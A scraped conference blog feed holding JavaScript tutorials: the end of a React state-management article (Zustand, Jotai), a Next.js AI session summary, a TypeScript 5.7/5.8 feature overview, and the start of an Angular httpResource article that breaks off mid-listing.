type Props = {
  product: Product;
};
const ListItem: FC<Props> = ({ product }) => {
  const inputRef = useRef<HTMLInputElement>(null);
  const [cart] = useCart();
  const addToCart = useAddToCart();

  return (
    <li>
      {product.name}{' '}
      <input
        type="text"
        ref={inputRef}
        defaultValue={
          cart.items.find((item) => item.id === product.id)?.quantity
        }
      />{' '}
      <button
        onClick={() =>
          addToCart({ ...product, quantity: Number(inputRef.current?.value) })
        }
      >
        add
      </button>
    </li>
  );
};

export default ListItem;

Read access to the state is still with the useCart function. The useAddToCart function creates a new function that you can pass a new updated item from the shopping cart to. This function generates the necessary action and dispatches it via the middleware.

Both the useState and useReducer approaches require a relatively large amount of boilerplate code around the application’s state management’s business logic. Therefore, libraries exist and “state” is one of the most lightweight.

What Makes Zustand a Scalable State Management Solution?

The Zustand library takes care of the state of an application. The Zustand API is minimalistic, yet the library has all the features you need to centrally manage the state of your application. The stores are the central element, which are created with the create function. They hold the state and provide methods for modification. In your application’s components, you can interact with Zustand’s stores using hook functions. The library lets you perform both synchronous and asynchronous actions and gives the option of storing the state in the browser’s LocalStorage or IndexedDb via middleware. We don’t have to go that far for shopping cart management implementation in our example. It’s enough to load an existing shopping cart from the server and manage it with the list component. It should be possible to access the state from other components, like CartOverview, which shows a summary of the shopping cart.

Before you can use Zustand, you have to install the library with your package manager. You can do this with npm using the command npm add zustand. The library comes with its own type definitions, so you don’t need to install any additional packages to use it in a TypeScript environment.

Create the CartStore outside the components of your application in a separate file. This manages items in the shopping cart. You can control access to the store with the useCartStore function, which gives access to the state and provides methods for adding products and loading the shopping cart from the server. Listing 6 shows the implementation details.

Listing 6: Access to the store

import { create } from 'zustand';
import { CartItem } from './types/Cart';

export type CartStore = {
  cartItems: CartItem[];
  addToCart: (item: CartItem) => Promise<void>;
  loadCart: () => Promise<void>;
};

export const useCartStore = create<CartStore>((set, get) => ({
  cartItems: [],

  addToCart: async (item: CartItem) => {
    set((state) => {
      const existingItemIndex = state.cartItems.findIndex(
        (cartItem) => cartItem.id === item.id
      );

      let updatedCart: CartItem[];
      if (existingItemIndex !== -1) {
        updatedCart = [...state.cartItems];
        updatedCart[existingItemIndex] = item;
      } else {
        updatedCart = [...state.cartItems, item];
      }

      return { cartItems: updatedCart };
    });

    await saveCartToServer(get().cartItems);
  },

  loadCart: async () => {
    const response = await fetch('http://localhost:3001/cart');
    const data: CartItem[] = (await response.json())['items'];
    set({ cartItems: data });
  },
}));

function saveCartToServer(cartItems: CartItem[]): void {
  fetch('http://localhost:3001/cart', {
    method: 'PUT',
    headers: { 'Content-Type': 'application/json' },
    body: JSON.stringify({ items: cartItems }),
  });
}

The create function of state is implemented as a generic function. This means you can pass the state structure to it. TypeScript helps where needed, whether in your development environment or your application’s build process. Pass a callback function to the create function; you can use the get function for read access and the set function for write access to the state. The set function behaves similarly to React’s setState function. You can use the previous state to define a new structure and use it as the return value. The callback function that you pass to create returns an object structure. Then, define the state structure (in our case, this is cartItems) and methods for accessing it like addToCart and loadCart. The addToCart method is implemented as an async method and manipulates the state with the set function. It also uses the helper function saveCartToServer to send the data to the server. After set is executed, the state already has the updated value, so you can read it with get. Always try to treat the state as a single source of truth.

The asynchronous loadCart method is used to initially fill the state with data from the server. You should execute this method once in a central location to make sure that the state is initialized correctly. Listing 7 shows an example using the application’s app component.

Listing 7: Integrating into the app component

import './App.css';
import List from './List';
import CartOverview from './CartOverview';
import { useCartStore } from './cartStore';
import { useEffect } from 'react';

function App() {
  const { loadCart } = useCartStore();

  useEffect(() => {
    loadCart();
  }, []);

  return (
    <>
      <CartOverview />
      <hr />
      <List />
    </>
  );
}

export default App;

Work with state happens in your application’s components, like the ListItem component. Here, you call the useCartStore function and use the cartItems structure to access the data in the store and add new products using the addToCart method. Listing 8 contains the corresponding code.

Listing 8: Integration into the ListItem component

import { FC, useRef } from 'react';
import { Product } from './types/Product';
import { useCartStore } from './cartStore';

type Props = {
  product: Product;
};
const ListItem: FC<Props> = ({ product }) => {
  const inputRef = useRef<HTMLInputElement>(null);
  const { cartItems, addToCart } = useCartStore();

  return (
    <li>
      {product.name}{' '}
      <input
        type="text"
        ref={inputRef}
        defaultValue={
          cartItems.find((item) => item.id === product.id)?.quantity
        }
      />{' '}
      <button
        onClick={() =>
          addToCart({ ...product, quantity: Number(inputRef.current?.value) })
        }
      >
        add
      </button>
    </li>
  );
};

export default ListItem;

What’s remarkable about State is that you don’t have to worry about integrating a provider. That’s because State doesn’t rely on React’s Context API to manage global state. One disadvantage is that State is truly global. So you can’t have two identical stores with different data states in your component hierarchy’s subtrees. On the other hand, bypassing the Context API has some performance advantages that make Zustand an interesting alternative.

Why Choose Jotai for React State Management?

Similar to Zustand, Jotai is a lightweight library for state management in React. The library works with small, isolated units called atoms and uses React’s Hook API. Like Zustand, Jotai does not use React’s Context API by default. Individual central state elements and the interfaces to it are significantly smaller and clearly separated from each other. The atom function plays a central role, allowing you to define both the structure and the access functions. This definition takes place outside of the application’s components. Connection between the atoms and components is formed by the useAtom function, which enables you to interact with the central state.

You can install the Jotai library with the command npm add jotai. The difference between it and Zustand is that Jotai works with much finer structures. The atom is the central element here. In a simple instance, you pass the initial value to the atom function when you call it and can use it throughout your application. If you’re using TypeScript, you have the option of defining the type of the atom value as generic.

Jotai provides three different hook functions for accessing the atom from a component. useAtom returns a tuple for read and write access. This tuple is similar in structure to the tuple returned by React’s useState hook. useAtomValue returns only the first part of the tuple, giving you read-only access to the atom. The counterpart is the useSetAtom function, which gives you the setter function for the atom. You can already achieve a lot with this structure, but Jotai also lets you combine atoms. To implement the shopping cart state, you create three atoms in total. One represents the shopping cart, one is for adding products, and one is for loading data from the server. Listing 9 shows the implementation details.

Listing 9: Implementing the atoms

import { atom } from 'jotai';
import { CartItem } from './types/Cart';

const cartItemsAtom = atom<CartItem[]>([]);

async function saveCartToServer(cartItems: CartItem[]): Promise<void> {
  await fetch('http://localhost:3001/cart', {
    method: 'PUT',
    headers: { 'Content-Type': 'application/json' },
    body: JSON.stringify({ items: cartItems }),
  });
}

const addToCartAtom = atom(null, async (get, set, item: CartItem) => {
  const currentCart = get(cartItemsAtom);
  const existingItemIndex = currentCart.findIndex(
    (cartItem) => cartItem.id === item.id
  );

  let updatedCart: CartItem[];
  if (existingItemIndex !== -1) {
    updatedCart = [...currentCart];
    updatedCart[existingItemIndex] = item;
  } else {
    updatedCart = [...currentCart, item];
  }

  set(cartItemsAtom, updatedCart);

  await saveCartToServer(updatedCart);
});

const loadCartAtom = atom(null, async (_get, set) => {
  const response = await fetch('http://localhost:3001/cart');
  const data: CartItem[] = (await response.json())['items'];
  set(cartItemsAtom, data);
});

export { cartItemsAtom, addToCartAtom, loadCartAtom };

You implement your application’s atoms separately from your components. For the cartItemsAtom, call the atom function with an empty array and define the type as a CartItem array. When implementing the business logic, also use the atom function, but pass the value null as the first argument and a function as the second. This creates a derived atom that only allows write access. In the function, you have access to the get and set functions. You can use these to access another atom – in this case, the cartItemsAtom. You can also support additional parameters that are passed when the function is called. For write access with set, pass a reference to the atom and then the updated value. Since the function can be asynchronous, you can easily integrate a side effect like loading data from the server or writing the updated shopping cart. The atoms are integrated into the application components using the Jotai hook functions. Listing 10 shows how this works in the ListItem component example.

Listing 10: Integration in the ListItem Component

import { FC, useRef } from 'react';
import { Product } from './types/Product';
import { useAtom, useAtomValue, useSetAtom } from 'jotai';
import { cartItemsAtom, addToCartAtom } from './cart.atom';

type Props = {
  product: Product;
};
const ListItem: FC<Props> = ({ product }) => {
  const inputRef = useRef<HTMLInputElement>(null);
  const cartItems = useAtomValue(cartItemsAtom);
  const addToCart = useSetAtom(addToCartAtom);

  return (
    <li>
      {product.name}{' '}
      <input
        type="text"
        ref={inputRef}
        defaultValue={
          cartItems.find((item) => item.id === product.id)?.quantity
        }
      />{' '}
      <button
        onClick={() =>
          addToCart({ ...product, quantity: Number(inputRef.current?.value) })
        }
      >
        add
      </button>
    </li>
  );
};

export default ListItem;

For read access, you can use the useAtomValue function directly, since you use the derived atoms for write operations. The useSetAtom function is used for this. To add a product to the shopping cart, simply call the addToCart function with the new shopping cart item. Jotai takes care of everything else. This is also true when updating all components affected by the atom change.

Conclusion

In this article, you learned about different approaches to state management in a React application. We focused on lightweight approaches that don’t dictate your application’s entire architecture. The first approach used React’s very own interfaces – state or reducers and context. This gives you the maximum amount of freedom and flexibility in your implementation, but you also must take care of all the implementation details yourself.

If you’re willing to sacrifice some of this flexibility and accept an extra dependency in your application, libraries like Zustand or Jotai are a helpful alternative. Both libraries take different approaches. Zustand offers a compact solution that concentrates both the structure and logic in one structure. Jotai, on the other hand, works with smaller units and lets you derive or combine these units, making your application more flexible and individual parts easier to exchange. Ultimately, the solution you choose depends upon the use case and your personal preferences.

🔍 Frequently Asked Questions (FAQ)

1. What are common reasons for implementing central state management in React?

Central state management is often necessary due to the component-based architecture of single-page applications. It enables efficient data sharing between deeply nested components without passing props through intermediate layers.

2. How does React’s Context API facilitate central state management?

The Context API allows React components to access shared state directly, bypassing the need to pass data through the component tree. This improves reusability and reduces coupling between components.

3. What are typical use cases for central state management in frontend applications?

Use cases include applications involving data record management such as e-commerce carts, address books, fleet management, and smart home systems. These scenarios require consistent, shared data access across multiple components.

4. How can you implement state management using only React without external libraries?

You can use a combination of useState and the Context API to manage and distribute state throughout the component tree. This lightweight method avoids additional dependencies but may require more boilerplate.

5. What are the advantages and limitations of Redux for state management?

Redux offers powerful state control and is suitable for large-scale applications, especially with tools like Redux Toolkit. However, it can introduce unnecessary overhead for smaller projects.

6. How does the useReducer hook enhance state logic separation?

The useReducer hook enables state manipulation through pure functions and action objects, improving code clarity and testability. It also allows the introduction of middleware for handling asynchronous actions.

7. What benefits does Zustand offer over React’s built-in state tools?

Zustand simplifies state logic by consolidating state and actions into centralized stores, avoiding the need for context providers. It supports asynchronous operations and optional local persistence via middleware.

8. How does Jotai manage state differently than Zustand?

Jotai uses atomic state units called atoms and provides fine-grained state control with minimal coupling. It emphasizes modularity and composability, which can lead to cleaner, more scalable code structures.

9. When should you choose Zustand or Jotai over native React state solutions?

Libraries like Zustand and Jotai are ideal when you want to reduce boilerplate, avoid prop drilling, and need a lightweight but scalable alternative to Redux. The choice depends on project complexity and team preferences.

The post What’s the Best Way to Manage State in React? appeared first on International JavaScript Conference.

]]>
Watch Session: Build AI-Powered Apps with Next.js – Nir Kaufman https://javascript-conference.com/blog/ai-nextjs-nir-kaufman-workshop/ Wed, 09 Jul 2025 16:26:32 +0000 https://javascript-conference.com/?p=108186 In today’s fast-evolving web development landscape, integrating AI into your apps isn't just a trend—it's becoming a necessity. In this hands-on session, Nir Kaufman walks developers through building AI-driven applications using the Next.js framework. Whether you're exploring generative AI, large language models (LLMs), or building smarter interfaces, this session provides the perfect foundation.

The post Watch Session: Build AI-Powered Apps with Next.js – Nir Kaufman appeared first on International JavaScript Conference.

]]>
The session dives deep into practical ways to incorporate AI into web applications using Next.js, covering everything from LLM fundamentals to real-world coding demos.

1. Understanding AI and Large Language Models (LLMs)

The Session begins with an overview of how AI—especially generative AI models—can enhance modern web applications. Nir explains how LLMs understand and generate content based on user queries, opening the door to intelligent, context-aware features.

2. Integrating AI into Next.js

Participants learn how to connect their Next.js projects with AI APIs, fetching and utilizing model-generated data to enhance app functionality. This includes server-side and client-side integration techniques that ensure seamless performance.

3. Creating Intelligent, Adaptive Interfaces

One key highlight is building UIs that dynamically respond to user behavior. Nir demonstrates how to use AI-generated data to create content and interfaces that feel personalized and highly interactive.

4. Hands-On Coding Examples

Throughout the session, attendees follow along with real-world code samples. From generating UI components based on prompts to managing complex application state with AI logic, each example is designed for immediate application.

5. Best Practices for AI Integration

  • Performance: Use caching and smart data-fetching strategies to avoid bottlenecks.
  • Security: Keep API keys secure and handle user data responsibly.
  • Scalability: Design systems that can scale with increasing AI workloads.

iJS Newsletter

Keep up with JavaScript’s latest news!

Key Takeaways

  • AI enhances—rather than replaces—developer capabilities.
  • Dynamic user experiences are possible with personalized content generation.
  • Efficient state management is crucial in AI-enhanced UIs.
  • Security and privacy must be top priorities when dealing with user data and AI APIs.

Conclusion

This session equips developers with the tools and mindset to begin building powerful, AI-driven web applications using Next.js. Nir Kaufman’s practical approach bridges theory with real-world implementation, making it easier than ever to bring AI into your development stack.

If you’re ready to explore AI-powered features and elevate your web applications, this session is a must-watch. Watch the full video above and start turning your ideas into intelligent applications today.

Watch the full session below:

The post Watch Session: Build AI-Powered Apps with Next.js – Nir Kaufman appeared first on International JavaScript Conference.

]]>
What’s New in TypeScript 5.7/5.8 https://javascript-conference.com/blog/typescript-5-7-5-8-features-ecmascript-direct-execution/ Thu, 26 Jun 2025 12:29:50 +0000 https://javascript-conference.com/?p=108154 TypeScript is widely used today for developing modern web applications because it offers several advantages over a pure JavaScript approach. For example, TypeScript's static type system allows the written program code to be checked for errors during development and build time. This is also known as static code analysis and contributes to the long-term maintainability of the project. The two latest versions, TypeScript 5.7 from November 2024 and 5.8 from March 2025, bring several improvements and new features, which we will explore below.

The post What’s New in TypeScript 5.7/5.8 appeared first on International JavaScript Conference.

]]>
Improved Type Safety

TypeScript improves type safety in several areas. Variables that are never initialized are now detected more reliably. If a variable is declared but never assigned a value, the compiler reports an error. In certain situations, however, this cannot be determined unambiguously for TypeScript. Listing 1 shows such a situation: Within the function definition of “printResult()”, TypeScript cannot clearly determine which path is taken in the outer (separate) function. Therefore, TypeScript makes the “optimistic” assumption that the variable will be initialized.

Listing 1: Optimistic type check in different functional contexts

function foo() {
 let result: number
 if (myCondition()) {
   result = myCalculation();
 } else {
   const temporaryWork = myOtherCalculation();
   // Vergessen, 'result' zuzuweisen
 }
 printResult();
 function printResult() {
   console.log(result); // kein Compiler-Error
 }
}

With version 5.7, this situation has been improved, at least in cases where no conditions are used. In Listing 2, the variable “result” is not assigned, but this is also recognized within the function “printResult()” and now results in a compiler error.

iJS Newsletter

Keep up with JavaScript’s latest news!

Listing 2: Optimistic type check in different functional contexts

function foo() {
 let result: number
 // Weitere Logik, in der keine Zuweisung an 'result' erfolgt

 printResult();
 function printResult() {
   console.log(result); 
 // Variable 'result' is used before being assigned.(2454)
 }
}

Another type check ensures that methods with non-literal (or composite, ‘computed’) property names are consistently treated as index signatures in classes. This is shown in Listing 3 using a method that was created using an index signature.

Listing 3: Index signatures for classes

declare const sym: symbol;
export class MyClass {
 [sym]() { return 1; }
}
// Wird interpretiert als
export class MyClass { [x: symbol]: () => number; }

Previously, this method was ignored by the type system. With 5.7, it now appears as an index signature ([x: symbol] signature). This harmonizes the behavior with object literals and can be particularly useful for generic APIs.

Last but not least, version 5.7 introduces a stricter error message under the “noImplicitAny” compiler option. When this option is enabled, function definitions that do not declare an explicit return type are now checked more thoroughly. Functions without a return type are often arrow functions that are used as callback handlers, for example, in promise chains: “catch(() => null)”. If such handlers implicitly return “null” or “undefined,” the error “TS7011: Function expression, which lacks return-type annotation, implicitly has an ‘any’ return type” is now displayed. The typing is therefore stricter here, so that runtime errors can be better avoided in the future.

Latest ECMAScript and Node.js Support

With TypeScript 5.7, ECMAScript version 2024 can now be used as the compile target (e.g., via compiler flag: –target es2024). This is particularly useful for staying up to date and gaining access to the latest language features and new APIs. New APIs include “Object.groupBy()” and “Map.groupBy()”, which can be used to group an iterable or a map. Listing 4 shows this using an array called “inventory” containing various supermarket products. The array is to be divided into two groups: products that are still available (“sufficient”) and products that need to be restocked (‘restock’). The function “Object.groupBy()” is now passed the array to be grouped and a function that returns which group each item in the array belongs to. The return value of the GroupBy function is an object (here the variable “result”) that contains the different groups as parameters. Each group is again an array (see the console.log outputs in Listing 4). If a group does not contain any entries, the entire group is “undefined.”

Listing 4: Arrays gruppieren mittels Object.groupBy()

const inventory = [
 { name: "asparagus", type: "vegetables", quantity: 9 },
 { name: "bananas", type: "fruit", quantity: 5 },
 { name: "cherries", type: "fruit", quantity: 12 }
];

const result = Object.groupBy(inventory, ({ quantity }) =>
 quantity < 10 ? "restock" : "sufficient",
);

console.log(result.restock);
// [{ name: "asparagus", type: "vegetables", quantity: 9 },
//  { name: "bananas", type: "fruit", quantity: 5 }]

console.log(result.sufficient);
// [{ name: "cherries", type: "fruit", quantity: 12 }]

If more complex calculations are performed, or if WASM, multiple workers, and correspondingly complex setups are used, TypedArray classes (e.g., “Uint8Array”), “ArrayBuffer,” and/or “SharedArrayBuffer” are also frequently used. The length of ArrayBuffers can be changed in ES2024 (‘resize()’), while SharedArrayBuffers can ‘only’ grow (‘grow()’). Therefore, both buffer variants obviously have different APIs. However, the TypedArray classes always use a buffer under the hood. To harmonize the newly created API differences, the common supertype ‘ArrayBufferLike’ is used. If a specific implementation is to be used, the buffer type used can now be specified explicitly, as all TypedArray classes are now generically typed with respect to the underlying buffer types. Listing 5 illustrates this, showing that in the case of “Uint8Array,” “view” can always access the correct buffer variant “SharedArrayBuffer.”

Listing 5: TypedArrays mit generischem Buffer-Typ

// Neu: TypedArray mit generischem ArrayBuffer-Typ
interface Uint8Array<T extends ArrayBufferLike = ArrayBufferLike> { /* ... */ }

// Verwendung mit einem konkreten Typen:
// Hier SharedArrayBuffer
const buffer = new SharedArrayBuffer(16, { maxByteLength: 1024 });
const view = new Uint8Array(buffer);

view.buffer.grow(512); // `grow` exisitiert nur auf SharedArrayBuffer

Directly Executable TypeScript

In addition to the new features, TypeScript also supports libraries that enable TypeScript files to be executed directly without a compile step (e.g., “ts-node,” “tsx,” or Node 23.x with “–experimental-strip-types”). Direct execution of TypeScript can speed up development processes, for example, by skipping the build/compile task between development and execution and “catching up” later. This becomes possible when relative imports are adjusted: Normally, imports do not have a file extension (see Listing 6), so that the imports do not have to differ between the source code and the compiled result. However, executing the file directly without translation requires the “.ts” extension (Listing 6). Such an import usually results in a compiler error. With the new compiler option “–rewriteRelativeImportExtensions,” all TypeScript extensions are automatically rewritten (from .ts.tsx.mts.cts to .js.jsx.mjs.cjs). On the one hand, this provides better support for direct execution. On the other hand, it is also possible to use and compile the TypeScript files in the normal TypeScript build process, which is important, for example, for authors of libraries who want to test their files quickly without a compile step, but also need the real TypeScript build before publishing the library.

EVERYTHING AROUND ANGULAR

Explore the iJS Angular Development Track

Listing 6: Import with .ts extension

import {Demo} from './bar'; //<-Standard-Import
import {Demo} from './bar.ts'; //<-Zum direkten Ausführen nötig

If the Node.js option “–experimental-strip-types” is used to execute TypeScript directly, care must be taken to ensure that only TypeScript constructs that are easy to remove (strip) for Node.js are used. To better support this use case, the new compiler option “–erasableSyntaxOnly” has been added in 5.8. This option prohibits TypeScript-only features such as enums, namespaces, parameter properties (see also Listing 7), and special import forms and marks them as compiler errors.

Listing 7: Constructs prohibited under “–erasableSyntaxOnly”

// error: Namespace mit Runtime-Code
namespace container {
}

class Point {
 // error: Implizite Properties/Parameter-Properties
 constructor(public x: number, public y: number) { }
}

// error: Enum-Deklaration
enum Direction {
 Up,
 Down
}

Further Improvements

The TypeScript team naturally wants to make the development process as pleasant as possible for all developers. To this end, it naturally also uses all the new options available under the hood. In Node.js 22, for example, a caching API (“module.enableCompileCache()”) was introduced, which TypeScript now uses to save recurring parsing and compilation costs. In benchmarks, compiling tsc was about two to three times faster than before.

By default, the compiler checks whether special “@typescript/lib-**” packages are installed. These packages can be used to replace the standard TypeScript libraries in order to customize the behavior of what are actually native TypeScript APIs. The check for such library packages was always performed previously, even if no library packages were used. This can mean unnecessary overhead for many files or in large projects. With the new compiler option “–libReplacement=false*,” this behavior can be disabled, which can improve initialization time, especially in very large projects and monorepos.

Support for developer tools is also an important task for TypeScript. Therefore, there have also been updates to project and editor support. When an editor that uses the TS language server loads a file, it searches for the corresponding “tsconfig.json.” Previously, it stopped at the first match, which often led to the editor assigning the wrong configuration to a file in monorepo-like structures and thus not offering correct developer support. With the new TypeScript versions, the project is now searched further up if necessary to find a suitable configuration. For example, in Listing 8, the test file “foo-test.ts” is now correctly used with the configuration “projekt/src/tsconfig.test.json” and not accidentally with the main configuration “projekt/tsconfig.json”. This makes it easier to work in “workspaces” or composite setups with multiple subprojects.

iJS Newsletter

Keep up with JavaScript’s latest news!

Listing 8: Repo structure with multiple TSConfigs

projekt/
├── src/
│   ├── tsconfig.json
│   ├── tsconfig.test.json
│   ├── foo.ts
│   └── foo-test.ts
└── tsconfig.json

Conclusion

TypeScript 5.7 and 5.8 offer a variety of direct and indirect improvements for developers. In particular, they increase type safety (better errors for uninitialized variables, stricter return checks) and bring the language up to date with ECMAScript. At the same time, they improve the developer experience through faster build processes (compile caching, optimized checks), extended Node.js support, and more flexible configuration for monorepos.

The TypeScript team is already working on many large and small improvements for the future. TypeScript 5.9 is in the starting blocks and is scheduled for release at the end of July. In addition, a major change is planned: the TypeScript runtime is to be completely rewritten in Go for version 7. Initial tests have shown that with the help of the new compiler written in Go, it is possible to achieve up to 10 times faster builds for your own projects.

🔍 Frequently Asked Questions (FAQ)

1. What are the key improvements in TypeScript 5.7?
TypeScript 5.7 brings a host of enhancements, including better type safety, improved management of uninitialized variables, stricter enforcement of return types, and a more consistent approach to recognizing computed property names as index signatures.

2. How does TypeScript 5.8 support direct execution?
With TypeScript 5.8, you can now run .ts files directly using tools like ts-node or Node.js with the –experimental-strip-types flag. New compiler options like –rewriteRelativeImportExtensions and –erasableSyntaxOnly make this process even smoother.

3. What new JavaScript (ECMAScript 2024) features are supported?
TypeScript has added support for ECMAScript 2024 features, including Object.groupBy() and Map.groupBy(), which allow for powerful grouping operations on arrays and maps. It also introduces support for resizable and growable ArrayBuffer and SharedArrayBuffer types.

4. What does the –erasableSyntaxOnly compiler option do?
The –erasableSyntaxOnly option, introduced in TypeScript 5.8, prevents the use of TypeScript-specific constructs like enums, namespaces, and parameter properties in code meant for direct execution, ensuring it works seamlessly with Node.js’s stripping behavior.

5. How has type checking changed for computed method names?
In TypeScript 5.7, methods that use computed (non-literal) property names in classes are now treated as index signatures. This change aligns class behavior more closely with object literals, enhancing consistency for generic and dynamic APIs.

6. What are the benefits of compile caching in newer versions?
TypeScript now takes advantage of Node.js’s compile cache API, which cuts down on unnecessary parsing and compilation. This results in build times that can be 2 to 3 times faster, particularly in larger projects.

7. How does TypeScript handle multiple tsconfig files in monorepos?
In TypeScript 5.8, the compiler and language server have improved support for monorepos by continuing to search parent directories for the most suitable tsconfig.json. This enhancement boosts file association and IntelliSense accuracy in complex workspaces.

The post What’s New in TypeScript 5.7/5.8 appeared first on International JavaScript Conference.

]]>
Exploring httpResource in Angular 19.2 https://javascript-conference.com/blog/exploring-httpresource-angular-19/ Mon, 19 May 2025 11:30:20 +0000 https://javascript-conference.com/?p=107841 Angular 19.2 introduced the experimental httpResource feature, streamlining HTTP data loading within the reactive flow of applications. By leveraging signals, it simplifies asynchronous data fetching, providing developers with a more streamlined approach to handling HTTP requests. With Angular 20 on the horizon, this feature will evolve further, offering even more power for managing data in reactive applications. Let’s explore how to leverage httpResource to enhance your applications.

The post Exploring httpResource in Angular 19.2 appeared first on International JavaScript Conference.

]]>
As an example, we have a simple application that scrolls through levels in the style of the game Super Mario. Each level consists of tiles that are available in four different styles: overworldundergroundunderwater, and castle. In our implementation, users can switch freely between these styles. Figure 1 shows the first level in overworld style, while Figure 2 shows the same level in underground style.

Level 1 in Overworld style

Figure 1: Level 1 in overworld style

Level 1 in the Underground style

Figure 2: Level 1 in the underground style

LevelComponent in the example application takes care of loading level files (JSON) and tiles for drawing the levels using an httpResource. To render and animate the levels, the example relies on a very simple engine that is included with the source code but is treated as a black box here in the article.

HttpClient in the substructure enables the use of interceptors

At its core, the new httpResource currently uses the good old HttpClient. Therefore, the application has to provide this service, which is usually done by calling provideHttpClient during bootstrapping. As a consequence, the httpResource also automatically picks up the registered HttpInterceptors.

However, the HttpClient is just an implementation detail that Angular may eventually replace with a different implementation.

iJS Newsletter

Keep up with JavaScript’s latest news!

Level files

The different levels are described by our example JSON files, which define which tiles are to be displayed at which coordinates (Listing 1).

Listing 1:

{
  "levelId": 1,
  "backgroundColor": "#9494ff",
  "items": [
    { "tileKey": "floor", "col": 0, "row": 13, [...] },
    { "tileKey": "cloud", "col": 12, "row": 1, [...] },
    [...]
  ]
}

These coordinates define positions within a matrix of blocks measuring 16×16 pixels. An overview.json file is provided with these level files, which provides information about the names of the available levels.

LevelLoader takes care of loading these files. To do this, it uses the new httpResource (Listing 2).

Listing 2:

@Injectable({ providedIn: 'root' })
export class LevelLoader {
  getLevelOverviewResource(): HttpResourceRef<LevelOverview> {
    return httpResource<LevelOverview>('/levels/overview.json', {
      defaultValue: initLevelOverview,
    });
  }

  getLevelResource(levelKey: () => string | undefined): HttpResourceRef<Level> {
    return httpResource<Level>(() => !levelKey() ? undefined : `/levels/${levelKey()}.json`, {
      defaultValue: initLevel,
    });
  }

 [...]
}

The first parameter passed to httpResource represents the respective URL. The second optional parameter accepts an object with further options. This object allows the definition of a default value that is used before the resource has been loaded.

The getLevelResource method expects a signal with a levelKey, from which the service derives the name of the desired level file. This read-only signal is an abstraction of the type () => string | undefined.

The URL passed from getLevelResource to httpResource is a lambda expression that the resource automatically reevaluates when the levelKey signal changes. In the background, httpResource uses it to generate a calculated signal that acts as a trigger: every time this trigger changes, the resource loads the URL.

To prevent the httpResource from being triggered, this lambda expression must return the value undefined. This way, the loading can be delayed until the levelKey is available.

Further options with HttpResourceRequest

To get more control over the outgoing HTTP request, the caller can pass an HttpResourceRequest instead of a URL (Listing 3).

Listing 3:

getLevelResource(levelKey: () => string) {
  return httpResource<Level>(
    () => ({
      url: `/levels/${levelKey()}.json`,
      method: "GET",
      headers: {
        accept: "application/json",
      },
      params: {
        levelId: levelKey(),
      },
      reportProgress: false,
      body: null,
      transferCache: false,
      withCredentials: false,
    }),
    { defaultValue: initLevel }
  );
}

This HttpResourceRequest can also be represented by a lambda expression, which the httpResource uses to construct a calculated signal internally.

It is important to note that although the httpResource offers the option to specify HTTP methods (HTTP verbs) beyond GET and a body that is transferred as a payload, it is only intended for retrieving data. These options allow you to integrate web APIs that do not adhere to the semantics of HTTP verbs. By default, the httpResource converts the passed body to JSON.

With the reportProgress option, the caller can request information about the progress of the current operation. This is useful when downloading large files. I will discuss this in more detail below.

Analyzing and validating the received data

By default, the httpResource expects data in the form of JSON that matches the specified type parameter. In addition, a type assertion is used to ensure that TypeScript assumes the presence of correct types. However, it is possible to intervene in this process to provide custom logic for validating the received raw value and converting it to the desired type. To do this, the caller defines a function using the map property in the options object (Listing 4).

Listing 4:

getLevelResourceAlternative(levelKey: () => string) {
  return httpResource<Level>(() => `/levels/${levelKey()}.json`, {
    defaultValue: initLevel,
    map: (raw) => {
      return toLevel(raw);
    },
  });
}

The httpResource converts the received JSON into an object of type unknown and passes it to map. In our example, a simple self-written function toLevel is used. In addition, map also allows the integration of libraries such as Zod, which performs schema validation.

EVERYTHING AROUND ANGULAR

Explore the iJS Angular Development Track

Loading data other than JSON

By default, httpResource expects a JSON document, which it converts into a JavaScript object. However, it also offers other methods that provide other forms of representation:

  • httpResource.text returns text
  • httpResource.blob returns the retrieved data as a blob
  • httpResource.arrayBuffer returns the retrieved data as an ArrayBuffer

To demonstrate the use of these possibilities, the example discussed here requests an image with all possible tiles as a blob. From this blob, it derives the tiles required for the selected level style. Figure 3 shows a section of this tilemap and illustrates that the application can switch between the individual styles by choosing a horizontal or vertical offset.

Section of the tilemap used in the example

Figure 3: Section of the tilemap used in the example (Source)

A TilesMapLoader delegates to httpResource.blob to load the tilemap (Listing 5).

Listing 5:

@Injectable({ providedIn: "root" })
export class TilesMapLoader {
  getTilesMapResource(): HttpResourceRef<Blob | undefined> {
    return httpResource.blob({
      url: "/tiles.png",
      reportProgress: true,
    });
  }
}

This resource also requests progress information and uses the example to display the progress information to the left of the drop-down fields.

Putting it all together: reactive flow

The httpResources described in the last sections can now be combined into the reactive graph of the application (Figure 4).

Reactive flow of ngMario

Figure 4: Reactive flow of ngMario

The signals levelKeystyle, and animation represent the user input. The first two correspond to the drop-down fields at the top of the application. The animation signal contains a Boolean that indicates whether the animation was started by clicking the Toggle Animation button (see screenshots above).

The tilesResource is a classic resource that derives the individual tiles for the selected style from the tilemap. To do this, it essentially delegates to a function of the game engine, which is treated as a black box here.

The rendering is triggered by an effect, especially since we cannot draw the level directly using data binding. It draws or animates the level on a canvas, which the application retrieves as a signal-based viewChild. Angular then calls the effect whenever the level (provided by the levelResource), the style, the animation flag, or the canvas changes.

tilesMapProgress signal uses the progress information provided by tilesMapResource to indicate how much of the tilesmap has already been downloaded. To load the list of available levels, the example uses a levelOverviewResource that is not directly connected to the reactive graph discussed so far.

Listing 6 shows the implementation of this reactive flow in the form of fields of the LevelComponent.

Listing 6:

export class LevelComponent implements OnDestroy {
  private tilesMapLoader = inject(TilesMapLoader);
  private levelLoader = inject(LevelLoader);

  canvas = viewChild<ElementRef<HTMLCanvasElement>>("canvas");

  levelKey = linkedSignal<string | undefined>(() => this.getFirstLevelKey());
  style = signal<Style>("overworld");
  animation = signal(false);

  tilesMapResource = this.tilesMapLoader.getTilesMapResource();
  levelResource = this.levelLoader.getLevelResource(this.levelKey);
  levelOverviewResource = this.levelLoader.getLevelOverviewResource();

  tilesResource = createTilesResource(this.tilesMapResource, this.style);

  tilesMapProgress = computed(() =>
    calcProgress(this.tilesMapResource.progress())
  );

  constructor() {
    [...]
    effect(() => {
      this.render();
    });
  }

  reload() {
    this.tilesMapResource.reload();
    this.levelResource.reload();
  }

  private getFirstLevelKey(): string | undefined {
    return this.levelOverviewResource.value()?.levels?.[0]?.levelKey;
  }

  [...]
}

Using a linkedSignal for the levelKey allows us to use the first level as the default value as soon as the list of levels has been loaded. The getFirstLevelKey helper returns this from the levelOverviewResource.

The effect retrieves the named values from the respective signal and passes them to the engine’s animateLevel or rederLevel function (Listing 7).

Listing 7:

private render() {
  const tiles = this.tilesResource.value();
